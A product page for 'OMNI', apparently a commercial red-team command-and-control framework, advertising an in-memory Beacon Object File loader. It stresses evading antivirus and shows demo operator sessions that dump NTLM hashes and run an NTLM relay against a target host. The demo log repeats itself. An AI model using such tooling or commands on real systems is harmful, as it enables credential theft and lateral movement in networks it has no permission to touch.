English
العربية
中文語言
हिंदी भाषा
हespañol
русский
Português
Le français
Deutsch
ภาษาไทย
Português
Magyar
OMNI Feature
Beacon Object Files —
In-Memory Post-Exploitation, Zero Disk Writes
BOFs execute as COFF x86_64 objects loaded directly into the agent process — nothing touches disk, no new process is spawned, no PE on-disk signature for AV to match. OMNI ships 105+ TrustedSec BOFs pre-loaded covering credential access, host enumeration, lateral movement, and defence evasion. Custom BOFs can be uploaded and queued from the Web UI without server access.
105+
BOFs pre-loaded
Credentials
Enumeration
Lateral Move
Evasion
Technical Specifications
- Full COFF x86_64 parser and loader
- Module stomping + double-map execution
- Full Beacon API compatibility
- No disk writes, no new process spawned
- Custom BOF upload via Web UI drag-and-drop
- Output captured and displayed in session panel
- Runs in agent memory space — no injected thread
- Compatible with all TrustedSec public BOFs
# Upload and run a custom BOF against an active session
[omni@c2]$ bof upload ./custom_krbhash.o
[+] BOF registered: custom_krbhash (2.4 KB)
[omni@c2]$ bof run custom_krbhash --session SESSION-002
[+] Executing in-memory on WIN10-CORP (SESSION-002)
[+] 3 NTLM hashes captured — no disk write, no AV trigger
Explore Other Features
Use BOF Loader in your next engagement
Included in all OMNI plans — from $200/mo. 7-day money-back guarantee.
Live demo
[OMNI]❯[DEMO]❯[CORP-WS-042]» !bof whoami.x64
[*] Waiting for bof response (Timeout: 60s)...
[+] Response from CORP-WS-042:
UserName : CORP\jsmith
Domain : CORP
LogonType : Interactive
Groups : Domain Users, Remote Desktop Users, Developers
Privileges : SeChangeNotifyPrivilege, SeUndockPrivilege
└─ Saved: exfiltrated/CORP-WS-042/demo/bof/whoami_[demo].txt
[+] Command completed successfully
[OMNI]❯[DEMO]❯[CORP-WS-042]» !bof upload --path /opt/omni/bof/custom/ntlm_relay.x64.o
[*] Uploading custom BOF: ntlm_relay.x64.o (18.4 KB)...
[+] BOF uploaded and registered successfully
[OMNI]❯[DEMO]❯[CORP-WS-042]» !bof ntlm_relay.x64 --target 10.10.20.5 --port 445
[*] Executing BOF in beacon thread (in-process)...
[+] NTLM relay listener started on port 8445
[+] Waiting for authentication events...
[!] NTLMv2 hash captured: CORP\svc_sql::CORP:[demo-hash-omitted]
[+] Command completed successfully
[*] Waiting for bof response (Timeout: 60s)...
[+] Response from CORP-WS-042:
UserName : CORP\jsmith
Domain : CORP
LogonType : Interactive
Groups : Domain Users, Remote Desktop Users, Developers
Privileges : SeChangeNotifyPrivilege, SeUndockPrivilege
└─ Saved: exfiltrated/CORP-WS-042/demo/bof/whoami_[demo].txt
[+] Command completed successfully
[OMNI]❯[DEMO]❯[CORP-WS-042]» !bof upload --path /opt/omni/bof/custom/ntlm_relay.x64.o
[*] Uploading custom BOF: ntlm_relay.x64.o (18.4 KB)...
[+] BOF uploaded and registered successfully
[OMNI]❯[DEMO]❯[CORP-WS-042]» !bof ntlm_relay.x64 --target 10.10.20.5 --port 445
[*] Executing BOF in beacon thread (in-process)...
[+] NTLM relay listener started on port 8445
[+] Waiting for authentication events...
[!] NTLMv2 hash captured: CORP\svc_sql::CORP:[demo-hash-omitted]
[+] Command completed successfully
